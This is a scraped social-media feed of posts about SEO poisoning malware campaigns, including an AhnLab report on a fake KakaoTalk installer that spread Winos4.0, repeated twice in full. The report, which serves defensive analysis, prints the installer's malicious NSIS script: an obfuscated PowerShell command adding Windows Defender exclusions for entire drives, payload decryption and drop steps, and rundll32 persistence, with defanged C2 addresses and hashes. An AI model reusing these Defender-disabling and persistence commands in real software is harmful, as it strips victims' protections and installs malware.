BadIIS alone? Cute. While 1,800+ IIS servers moonlight as SEO scam billboards, this shows how IIS modules + HTTP fingerprints catch cloaking before your site starts selling “totally legit” malware 🙃🔎

#AlphaHunt #CyberSecurity #ThreatIntel #SEOPoisoning

Cybercriminals exploit SEO to distribute malware via fake software installers. Stay vigilant and download software only from official sources. #CyberSecurity #MalwareAlert #SEOpoisoning Link: thedailytechfeed.com/cybercrimina...

Winos4.0 malware disguised as KakaoTalk installation file Threat actors used SEO poisoning to place fake KakaoTalk download pages at the top of search results and distributed a malicious installer that infected over 5,000 PCs. The installer uses an invalid NetEase signature, decrypts and drops components (Verifier.exe, AutoRecoverDat.dll, GPUCache.xml/GPUCache2.xml) to establish persistence, add Windows Defender exclusions, and connect to...

Winos4.0 malware disguised as a fake KakaoTalk installer spread via SEO poisoning, infecting over 5,000 PCs. Malicious files bypassed Windows Defender and connected to C2 servers. #SEOpoisoning #MalwareAttack #SouthKorea

# distribution Methods – SEO Poisoning Typically, people perceive the sites that appear at the top of Google search results as the “most authoritative and official” sites. however, threat actors are playing on the psychology of such users, manipulating the search engine’s algorithms to place malicious sites at the top. SEO poisoning is an attack technique in which threat actors exploit search engine optimization (SEO) techniques to push malicious websites they control to the top of search results for specific keywords, often on pages one to three. the goal is to distribute malware or steal information by directing users to a carefully crafted fake site when they are trying to download official software or find information. [Figure 1] SEO Poisoning attack process AhnLab Security Intelligence Center (ASEC) recently confirmed that approximately 5,000+ PCs were infected when a fake KakaoTalk installer file was circulated using such SEO Poisoning techniques. the file looks like a KakaoTalk installer on the surface, but it executes malware internally and stays on the system continuously. Figure 2 below shows that the fake KakaoTalk installer is at the top of the list when searching for the PC version of KakaoTalk on Google. this is not the official KakaoTalk download page, but a fake site created by threat actors utilizing KakaoTalk characters and logos to look similar. the fake site appears to have used SEO poisoning techniques to trick search engine algorithms to force the malicious page to rank at the top for certain keywords. [Figure 2] Fake KakaoTalk sites appearing at the top of search engines (Bing and Google) The fake KakaoTalk sites are as follows, * hxxps://pc-kakaocorp[.]com The URL to which you are redirected to download the final malware is as follows. * hxxps://download.i96l6[.]top/KakaoTalk_Setup_patched.RAR * hxxps://xinjiapox.oss-ap-southeast-1.aliyuncs[.]com/KakaoTa2258.zip According to our infrastructure, the fake KakaoTalk installation file distributed in the above way was first distributed on March 9th. [Figure 3] Trend of fake KakaoTalk installation files (~3/14) # malware Analysis When downloading the installation file from the fake site, malware with the image of KakaoTalk is downloaded as shown below. It is signed with an invalid certificate with the name “NetEase” in China, not the officially distributed certificate of Kakao. [Figure 4] Invalid digital signature information The NSIS installation file contains a lot of encrypted data along with legitimate NSIS configuration files, and decrypts them during the execution process to create and execute malicious components such as Verifier.exe and AutoRecoverDat.dll. It also adds Windows Defender exception paths to weaken security features and secures persistence through DLL registration. in addition, it disguises itself as a legitimate installation file by creating and placing a legitimate KakaoTalk_Setup.exe together. ; Defender exception (neutralization) StrCpy $0 “cmd.exe /C powe$\”$\”r$\”$\”s$\”$\”h$\”$\”ell.exe -Ex$\”$\”ec$\”$\”uti$\”$\”o$\”$\”nPol$\”$\”ic$\”$\”y By$\”$\”pa$\”$\”s$\”$\”s -C$\”$\”om$\”$\”ma$\”$\”n$\”$\”d Ad$\”$\”d$\”$\”-M$\”$\”pPr$\”$\”ef$\”$\”ere$\”$\”nce -Ex$\”$\”cl$\”$\”usion$\”$\”Path C:\, D:\,E:\,F:\” nsExec::Exec $0 ; decryption and drop of encrypted payload StrCpy $R0 $TEMP\temp_k.txt StrCpy $R1 $TEMP\lic.dat DcryptDll::Decrypt FFF $R0 $R1**$LOCALAPPDATA\Verifier.exe** StrCpy $R2 $TEMP\Profilerjson DcryptDll::Decrypt FFF $R0 $R2 $LOCALAPPDATA\Profiler.json StrCpy $R3 $TEMP\GPUCachexml DcryptDll::Decrypt FFF $R0 $R3 $APPDATA\GPUCache.xml StrCpy $R5 $TEMP\GPUCache2xml DcryptDll::Decrypt FFF $R0 $R5 $APPDATA\GPUCache2.xml DcryptDll::Decrypt FFF $R0 $R3 $APPDATA\Embarcadero\GPUCache.xml DcryptDll::Decrypt FFF $R0 $R5 $APPDATA\Embarcadero\GPUCache2.xml StrCpy $R4 $TEMP\Auto.dat DcryptDll::Decrypt FFF $R0 $R4 $APPDATA\Embarcadero\AutoRecoverDat.dll ; Malicious DLL registration (persistence) StrCpy $8 “cmd.exe /C $\”start rundll32.exe $APPDATA\Embarcadero\AutoRecoverDat**.dll** ,DllRegisterServer$\”” nsExec::Exec $8 ; Run the main payload Exec $LOCALAPPDATA\Verifier.exe Sleep 25000 ; Create a normal KakaoTalk installation file and shortcut to it StrCpy $R9 $INSTDIR\DIR DcryptDll::Decrypt FFF $R0 $R9 $INSTDIR\KakaoTalk_Setup.exe CreateShortCut $DESKTOP\KakaoTalk_Setup.lnk $INSTDIR\KakaoTalk_Setup.**exe** ; includes additional obfuscated files File eqinpqabpwm File omyivwqtlzwtnl File xkaljrsp File ziucakk ; Registry tagging WriteRegStr HKCU MicrosoftUser Source kakao --- The behavior that performs malicious functions after the initial installation file is divided into two files. the execution flow is divided by the ShellCode (Profiler.json) file loaded by Verifier.exe and the ShellCode (GPUCache.xml) file loaded by AutoRecoverDat.dll executed by rundll32.exe. The relationship between the main files utilized by the malware is shown in the table below. **file name** | **role** ---|--- Verifier.exe | patches legitimate software to load ShellCode (Profiler.json) Profiler.json | ShellCode (Reflective DLL Loader, sRDI open source) GPUCache.xml | Winos4.0 malware GPUCache2.xml | Winos4.0 malware AutoRecoverDat.DLL | Loader that loads ShellCode (GPUCache.xml) The Verifier.exe file and AutoRecoverDat.dll file are executed in different ways, but both load GPUCache.xml or GPUCache2.xml (Winos4.0 malware). After creating a mutex with the hard-coded name **77825d8f-46d1-42d0-b298-83068bf9e31d** via the**CreateMutexA** API, the ShellCode that is loaded depends on two conditions. * condition 1: Whether or not a mutex with the same name already exists * condition 2: Whether the ActivityLog.xml file exists in the %APPDATA%\Embarcadero path If both conditions are met, the ShellCode of the %APPDATA%\Embarcadero\GPUCache2.xml file name is loaded; if either condition is not met, the ShellCode of the %APPDATA%\Embarcadero\GPUCache.xml file name is loaded. [Fig. 5] Difference of ShellCode file to load according to conditions It was also confirmed that C2 changes depending on which ShellCode is loaded. * GPUCache.xml * C2 : 192.238.129[.]47 * Port : 18852 * GpuCache2.xml * C2 : 119.28.70[.]225 * Port : 443 The **GPUCache(2).xml** file that is loaded at this time is a ShellCode that starts with 0xE8(OPCODE: CALL). it is not encrypted, so it has the code as it is, and it contains another executable file (DLL) inside. When ShellCode is executed, it loads the DLL file into memory and executes it. [Fig. 6] PE signature (MZ) inside ShellCode There is also logic to check if an AV product is installed. given that the targeted AV products checked by the threat actors are **360 Total Security and ZhuDongFangYu** , which are predominantly utilized in China, it is likely that the malware was originally created for distribution sites in China. [Figure 7] Determine if the AV product is active Depending on whether or not the AV product in question exists on the system, the subsequent method of maintaining persistence will differ, but in the end, the Task Scheduler will be created as shown below. * path (common): Microsoft\Windows\AppID * Task1: .NET Framework adv v6.0.4232 * Action: %LocalAppData%\Verifier.exe * Task2: .NET Framework JDAH v7.7 * Action: rundll32.exe %AppData%\Embarcadero\AutoRecoverDat.dll, DllRegisterServer Finally, the operational malware is identified as Winos4.0 malware. Winos4.0 malware mainly has the functions of screen capture, file/process control, system information collection, downloading additional malware, and avoiding monitoring/analysis environments. In particular, there is logic to execute packets received from C2 in the memory space allocated by VirtualAlloc if the C2 communication is successful. this means that additional malware can be executed, and it also means that the threat actor can change the attack flow as desired. # conclusion The more familiar a program is, the more likely users are to hit the “download” button without question. threat actors take advantage of such psychological lulls. Impersonating a program that is so deeply embedded in our daily lives, like KakaoTalk, can cause more than just hacking, it can cause serious damage to society as a whole. just because it’s at the top of the search results doesn’t mean it’s safe. make it a habit to check the official domain before downloading any installation files. Never forget that one cleverly crafted file can steal your personal information and assets in an instant. MD5 0ab84f52d043f7a7af54bd4df0331d64 108849450dd8410bf6217c9a7af82ab3 29152e0473edef5defc6752dabd0c53d 56ad524a33e5bb1ae8fee88d41b33294 8cad997c53fa31274ef0f542535c83b3 URL https[:]//download[.]i96l6[.]top/KakaoTalk_Setup_patched[.]rar https[:]//pc-kakaocorp[.]com/ https[:]//xinjiapox[.]oss-ap-southeast-1[.]aliyuncs[.]com/KakaoTa2258[.]zip IP 119[.]28[.]70[.]225 192[.]238[.]129[.]47 Gain access to related IOCs and detailed analysis by subscribing to **AhnLab TIP**. For subscription details, click the banner below. #### Tags: 카카오톡 SEOpoisoning TaskScheduler Winos4.0

Winos4.0 Malware Disguised as KakaoTalk Installer Distribution Method – SEO Poisoning Typically, people perceive the sites that appear at the top of Google search results as the “most authorita...

#Malware #Public #카카오톡 #SEOpoisoning #TaskScheduler #Winos4.0

Origin | Interest | Match

# distribution Methods – SEO Poisoning Typically, people perceive the sites that appear at the top of Google search results as the “most authoritative and official” sites. however, threat actors are playing on the psychology of such users, manipulating the search engine’s algorithms to place malicious sites at the top. SEO poisoning is an attack technique in which threat actors exploit search engine optimization (SEO) techniques to push malicious websites they control to the top of search results for specific keywords, often on pages one to three. the goal is to distribute malware or steal information by directing users to a carefully crafted fake site when they are trying to download official software or find information. [Figure 1] SEO Poisoning attack process AhnLab Security Intelligence Center (ASEC) recently confirmed that approximately 5,000+ PCs were infected when a fake KakaoTalk installer file was circulated using such SEO Poisoning techniques. the file looks like a KakaoTalk installer on the surface, but it executes malware internally and stays on the system continuously. Figure 2 below shows that the fake KakaoTalk installer is at the top of the list when searching for the PC version of KakaoTalk on Google. this is not the official KakaoTalk download page, but a fake site created by threat actors utilizing KakaoTalk characters and logos to look similar. the fake site appears to have used SEO poisoning techniques to trick search engine algorithms to force the malicious page to rank at the top for certain keywords. [Figure 2] Fake KakaoTalk sites appearing at the top of search engines (Bing and Google) The fake KakaoTalk sites are as follows, * hxxps://pc-kakaocorp[.]com The URL to which you are redirected to download the final malware is as follows. * hxxps://download.i96l6[.]top/KakaoTalk_Setup_patched.RAR * hxxps://xinjiapox.oss-ap-southeast-1.aliyuncs[.]com/KakaoTa2258.zip According to our infrastructure, the fake KakaoTalk installation file distributed in the above way was first distributed on March 9th. [Figure 3] Trend of fake KakaoTalk installation files (~3/14) # malware Analysis When downloading the installation file from the fake site, malware with the image of KakaoTalk is downloaded as shown below. It is signed with an invalid certificate with the name “NetEase” in China, not the officially distributed certificate of Kakao. [Figure 4] Invalid digital signature information The NSIS installation file contains a lot of encrypted data along with legitimate NSIS configuration files, and decrypts them during the execution process to create and execute malicious components such as Verifier.exe and AutoRecoverDat.dll. It also adds Windows Defender exception paths to weaken security features and secures persistence through DLL registration. in addition, it disguises itself as a legitimate installation file by creating and placing a legitimate KakaoTalk_Setup.exe together. ; Defender exception (neutralization) StrCpy $0 “cmd.exe /C powe$\”$\”r$\”$\”s$\”$\”h$\”$\”ell.exe -Ex$\”$\”ec$\”$\”uti$\”$\”o$\”$\”nPol$\”$\”ic$\”$\”y By$\”$\”pa$\”$\”s$\”$\”s -C$\”$\”om$\”$\”ma$\”$\”n$\”$\”d Ad$\”$\”d$\”$\”-M$\”$\”pPr$\”$\”ef$\”$\”ere$\”$\”nce -Ex$\”$\”cl$\”$\”usion$\”$\”Path C:\, D:\,E:\,F:\” nsExec::Exec $0 ; decryption and drop of encrypted payload StrCpy $R0 $TEMP\temp_k.txt StrCpy $R1 $TEMP\lic.dat DcryptDll::Decrypt FFF $R0 $R1**$LOCALAPPDATA\Verifier.exe** StrCpy $R2 $TEMP\Profilerjson DcryptDll::Decrypt FFF $R0 $R2 $LOCALAPPDATA\Profiler.json StrCpy $R3 $TEMP\GPUCachexml DcryptDll::Decrypt FFF $R0 $R3 $APPDATA\GPUCache.xml StrCpy $R5 $TEMP\GPUCache2xml DcryptDll::Decrypt FFF $R0 $R5 $APPDATA\GPUCache2.xml DcryptDll::Decrypt FFF $R0 $R3 $APPDATA\Embarcadero\GPUCache.xml DcryptDll::Decrypt FFF $R0 $R5 $APPDATA\Embarcadero\GPUCache2.xml StrCpy $R4 $TEMP\Auto.dat DcryptDll::Decrypt FFF $R0 $R4 $APPDATA\Embarcadero\AutoRecoverDat.dll ; Malicious DLL registration (persistence) StrCpy $8 “cmd.exe /C $\”start rundll32.exe $APPDATA\Embarcadero\AutoRecoverDat**.dll** ,DllRegisterServer$\”” nsExec::Exec $8 ; Run the main payload Exec $LOCALAPPDATA\Verifier.exe Sleep 25000 ; Create a normal KakaoTalk installation file and shortcut to it StrCpy $R9 $INSTDIR\DIR DcryptDll::Decrypt FFF $R0 $R9 $INSTDIR\KakaoTalk_Setup.exe CreateShortCut $DESKTOP\KakaoTalk_Setup.lnk $INSTDIR\KakaoTalk_Setup.**exe** ; includes additional obfuscated files File eqinpqabpwm File omyivwqtlzwtnl File xkaljrsp File ziucakk ; Registry tagging WriteRegStr HKCU MicrosoftUser Source kakao --- The behavior that performs malicious functions after the initial installation file is divided into two files. the execution flow is divided by the ShellCode (Profiler.json) file loaded by Verifier.exe and the ShellCode (GPUCache.xml) file loaded by AutoRecoverDat.dll executed by rundll32.exe. The relationship between the main files utilized by the malware is shown in the table below. **file name** | **role** ---|--- Verifier.exe | patches legitimate software to load ShellCode (Profiler.json) Profiler.json | ShellCode (Reflective DLL Loader, sRDI open source) GPUCache.xml | Winos4.0 malware GPUCache2.xml | Winos4.0 malware AutoRecoverDat.DLL | Loader that loads ShellCode (GPUCache.xml) The Verifier.exe file and AutoRecoverDat.dll file are executed in different ways, but both load GPUCache.xml or GPUCache2.xml (Winos4.0 malware). After creating a mutex with the hard-coded name **77825d8f-46d1-42d0-b298-83068bf9e31d** via the**CreateMutexA** API, the ShellCode that is loaded depends on two conditions. * condition 1: Whether or not a mutex with the same name already exists * condition 2: Whether the ActivityLog.xml file exists in the %APPDATA%\Embarcadero path If both conditions are met, the ShellCode of the %APPDATA%\Embarcadero\GPUCache2.xml file name is loaded; if either condition is not met, the ShellCode of the %APPDATA%\Embarcadero\GPUCache.xml file name is loaded. [Fig. 5] Difference of ShellCode file to load according to conditions It was also confirmed that C2 changes depending on which ShellCode is loaded. * GPUCache.xml * C2 : 192.238.129[.]47 * Port : 18852 * GpuCache2.xml * C2 : 119.28.70[.]225 * Port : 443 The **GPUCache(2).xml** file that is loaded at this time is a ShellCode that starts with 0xE8(OPCODE: CALL). it is not encrypted, so it has the code as it is, and it contains another executable file (DLL) inside. When ShellCode is executed, it loads the DLL file into memory and executes it. [Fig. 6] PE signature (MZ) inside ShellCode There is also logic to check if an AV product is installed. given that the targeted AV products checked by the threat actors are **360 Total Security and ZhuDongFangYu** , which are predominantly utilized in China, it is likely that the malware was originally created for distribution sites in China. [Figure 7] Determine if the AV product is active Depending on whether or not the AV product in question exists on the system, the subsequent method of maintaining persistence will differ, but in the end, the Task Scheduler will be created as shown below. * path (common): Microsoft\Windows\AppID * Task1: .NET Framework adv v6.0.4232 * Action: %LocalAppData%\Verifier.exe * Task2: .NET Framework JDAH v7.7 * Action: rundll32.exe %AppData%\Embarcadero\AutoRecoverDat.dll, DllRegisterServer Finally, the operational malware is identified as Winos4.0 malware. Winos4.0 malware mainly has the functions of screen capture, file/process control, system information collection, downloading additional malware, and avoiding monitoring/analysis environments. In particular, there is logic to execute packets received from C2 in the memory space allocated by VirtualAlloc if the C2 communication is successful. this means that additional malware can be executed, and it also means that the threat actor can change the attack flow as desired. # conclusion The more familiar a program is, the more likely users are to hit the “download” button without question. threat actors take advantage of such psychological lulls. Impersonating a program that is so deeply embedded in our daily lives, like KakaoTalk, can cause more than just hacking, it can cause serious damage to society as a whole. just because it’s at the top of the search results doesn’t mean it’s safe. make it a habit to check the official domain before downloading any installation files. Never forget that one cleverly crafted file can steal your personal information and assets in an instant. MD5 0ab84f52d043f7a7af54bd4df0331d64 108849450dd8410bf6217c9a7af82ab3 29152e0473edef5defc6752dabd0c53d 56ad524a33e5bb1ae8fee88d41b33294 8cad997c53fa31274ef0f542535c83b3 URL https[:]//download[.]i96l6[.]top/KakaoTalk_Setup_patched[.]rar https[:]//pc-kakaocorp[.]com/ https[:]//xinjiapox[.]oss-ap-southeast-1[.]aliyuncs[.]com/KakaoTa2258[.]zip IP 119[.]28[.]70[.]225 192[.]238[.]129[.]47 Gain access to related IOCs and detailed analysis by subscribing to **AhnLab TIP**. For subscription details, click the banner below. #### Tags: 카카오톡 SEOpoisoning TaskScheduler Winos4.0

Winos4.0 malware disguised as KakaoTalk installation file distribution Methods – SEO Poisoning Typically, people perceive the sites that appear at the top of Google search results as the “most ...

#Malware #Public #카카오톡 #SEOpoisoning #TaskScheduler #Winos4.0

Origin | Interest | Match

[DEEP RESEARCH] BadIIS Isn’t Enough: The IIS Module + HTTP Fingerprints That Catch SEO-Fraud Cloaking *Vendors are naming slices of the same IIS SEO fraud problem differently. This summary aligns those labels into one unified hunt surface and shows how to separate UAT-8099/WEBJACK from other…

Your IIS can be “fine” while it cloaks Google, poisons SEO, and serves malware. BadIIS detections alone won’t catch it—fingerprint the module + HTTP lies. 🍀🕵️

Subscribe + read the full hunt playbook: blog.alphahunt.io/deep-researc...

#AlphaHunt #CyberSecurity #SEOPoisoning #IIS

"SEO Poisoning - Mon site se fait attaquer depuis un an"

#Référencement #SEO #Korben #Blog #SEOpoisoning ...

korben.info/seo-poisonin...

Almost International Women’s Day: your IIS is treating Googlebot like a queen 👑… and humans like casino traffic 🎰. BadIIS isn’t enough—hunt the module + HTTP fingerprints or enjoy “mystery SEO.”

#AlphaHunt #CyberSecurity #SEOPoisoning #IIS

[DEEP RESEARCH] BadIIS Isn’t Enough: The IIS Module + HTTP Fingerprints That Catch SEO-Fraud Cloaking *Vendors are naming slices of the same IIS SEO fraud problem differently. This summary aligns those labels into one unified hunt surface and shows how to separate UAT-8099/WEBJACK from other…

BadIIS isn’t “just SEO spam”—it’s an IIS module that serves Googlebot champagne and users malware. Detect it with HTTP fingerprints, not vibes. 🔎🧨

Read the hunt breakdown (and subscribe): blog.alphahunt.io/deep-researc...

#AlphaHunt #CyberSecurity #SEOPoisoning #IIS

Over 1,800 Windows servers compromised by BADIIS malware in a massive SEO poisoning campaign. Learn how attackers manipulate search results and how to protect your servers. #CyberSecurity #Malware #SEOpoisoning Link: thedailytechfeed.com/seo-poisonin...

Global BADIIS SEO Poisoning Campaign

~Elastic~
Large-scale SEO poisoning campaign uses BADIIS malware to compromise 1,800+ IIS servers, redirecting users to gambling and phishing sites.
-
IOCs: gotz003. com, gotz001. com, uupbit. top
-
#BADIIS #SEOPoisoning #ThreatIntel

Microsoft: Poison AI buttons and links may betray your trust : Businesses are embedding prompts that produce content they want you to read, not the stuff AI makes if left to its own devices

#Microsoft warns that poisoned #AI buttons and links may betray your trust
www.theregister.com/2026/02/12/m...

Software giant says its security researchers have detected a surge in "AI Recommendation Poisoning."
#CyberSecurity #InfoSec #ArtificialIntelligence #SEOpoisoning

🎰 Your IIS server isn’t “stable” — it’s doing SEO fraud. Vendors call it UAT-8099 vs WEBJACK… same neighborhood, different stickers. Merge the hunt: modules + $ accounts + header-cloaking. 🔥🕵️‍♂️

blog.alphahunt.io/deep-researc...

#BadIIS #IIS #SEOPoisoning #AlphaHunt

Alina Amir Video Leaked on Social Media Alina Amir viral video links spreading on X and Telegram are part of a dangerous SEO poisoning scam using university domains to spread malware. No real leaked video exists.

Alina Amir Video Leaked on Social Media
#AlinaAmir #ViralVideoScam #SEOpoisoning #PakistaniInfluencer #CyberScam #MalwareAlert #FakeViral #TelegramScam #TikTokNews #DigitalSafety
dailytrendmirror.com/entertainmen...

BlackCat (ALPHV) linked to an SEO-poisoning campaign that hijacks popular software search results to push malicious download pages and payloads; the source reports no published IoCs. #BlackCat #SEOpoisoning #malware https://bit.ly/4jzoT34

Fake Microsoft Teams and Google Meet downloads are being used to spread the #Oyster backdoor malware instead of the real apps via poisoned search results and malicious ads.

Read: mashread.com/fake-microso...

#PotatoSecurity #Malware #MicrosoftTeams #GoogleMeet #SEOpoisoning #Malvertising

Fake Microsoft Teams and Google Meet Downloads Spread Oyster Backdoor Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread

Fake Microsoft Teams and Google Meet downloads are being used to spread the #Oyster backdoor malware instead of the real apps via poisoned search results and malicious ads.

Read: hackread.com/fake-microso...

#CyberSecurity #Malware #MicrosoftTeams #GoogleMeet #SEOpoisoning #Malvertising

Attackers are turning Google results into #malware delivery systems, using fake software installers and sponsored ads to plant backdoors inside organizations. Podcast: www.chatcyberside.com/e/search-res...

Video: youtu.be/xKKA1ikoZ-4

#SEOpoisoning #Malvertising #Cybersecurity #Software #Phishing

Cyberside Chats: Live! Poisoned Search: How Hackers Turn Google Results into Backdoors In this episode, Sherri Davidoff and Matt Durrin break down the latest SEO poisoning and malvertising research, including the Oyster/Broomstick campaign that hid backdoors inside fake installers. Lear...

Attackers are exploiting search results and online ads to spread #malware through fake software installers—and it’s working. In our next Cyberside Chats: Live! on 10/29, we'll uncover the latest #SEOpoisoning & #malvertising techniques & how they evade defenses. www.lmgsecurity.com/event/cybers...

SEO Poisoning Targets Ivanti VPN Users

~Zscaler~
An SEO poisoning campaign distributes a trojanized Ivanti VPN client to steal credentials for a C2 server.
-
IOCs: 4. 239. 95. 1, netml. shop, shopping5. shop
-
#Ivanti #SEOpoisoning #ThreatIntel

Cybercriminals are hijacking IIS servers using the BadIIS module to manipulate search results and redirect users to malicious sites. Stay vigilant! #CyberSecurity #IIS #BadIIS #SEOpoisoning Link: thedailytechfeed.com/cybercrimina...

Operation Rewrite è una campagna cinese di SEO poisoning che usa BadIIS per manipolare i motori di ricerca e reindirizzare utenti a siti scam.

#cina #CLUNK1037 #DragonRank #Group9 #OperationRewrite #SEOpoisoning
www.matricedigitale.it/2025/09/23/o...

⚠️ Operation Rewrite: Malicious IIS module hijacks websites

A Chinese-speaking threat actor deploys "BadIIS,” an IIS module that hijacks web servers to manipulate #SEO.

It detects search engine crawlers, serves poisoned content, then redirects real users to scam sites.

#ransomNews #SEOpoisoning

Operation Rewrite: BadIIS SEO Poisoning Campaign

~Paloalto~
Chinese-speaking actors use the BadIIS malware in a wide-scale SEO poisoning campaign targeting East and Southeast Asia.
-
IOCs: 103. 6. 235. 26, 404. 008php. com, 404. yyphw. com
-
#BadIIS #SEOpoisoning #ThreatIntel

Spot fakes • Skewer crooks • Show receipts

Dark Partners: 250+ fake AI/VPN sites + stolen certs push Poseidon (macOS) & PayDay (Win). Fresh week: hijacked Windows servers juicing Google rankings for scams. Stay click-sober. 🔐

#AlphaHunt #CyberSecurity #SEOpoisoning

SEO Poisoning Uses GitHub Pages to Distribute HiddenGh0st, Winos kkRAT

Cyber‑crime groups use SEO poisoning to hijack software‑download searches, serving HiddenGh0st, Winos and kkRAT from new malicious spoofed GitHub Pages sites. Read more: getnews.me/seo-poisoning-uses-githu... #seopoisoning #githubpages

SEO poisoning in Cina distribuisce Hiddengh0st e Winos via siti fake: tattiche, IoC, impatti e difese tecniche prioritarie.

#cina #fortinet #Hiddengh0st #SEOpoisoning #Winos
www.matricedigitale.it/2025/09/15/s...

SEO Poisoning Attack Hits Windows Users With Hiddengh0st and Winos Malware Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread

🚨 SEO poisoning alert! Watch what you download as #Windows users are being targeted with fake search results that lead to installers containing Hiddengh0st and Winos malware

Read: hackread.com/seo-poisonin...

#Cybersecurity #Malware #Hiddengh0st #Winos #SEOpoisoning

Dark Partners: Multi-Platform Crypto Theft via Fake AI, VPN, and Software Sites Dark Partners is a financially motivated cybercrime group active since at least May 2025, orchestrating large-scale cryptocurrency theft campaigns through a sophisticated infrastructure of fake…

Dark Partners turned Google search into a malware buffet 🍽️: 250+ fake AI/VPN/software sites + stolen certs push Poseidon & PayDay stealers. This week’s flavor? 3,900 poisoned domains + AI phish kits. Bon appétit, wallets.

#AlphaHunt #CyberSecurity #SEOpoisoning #Malware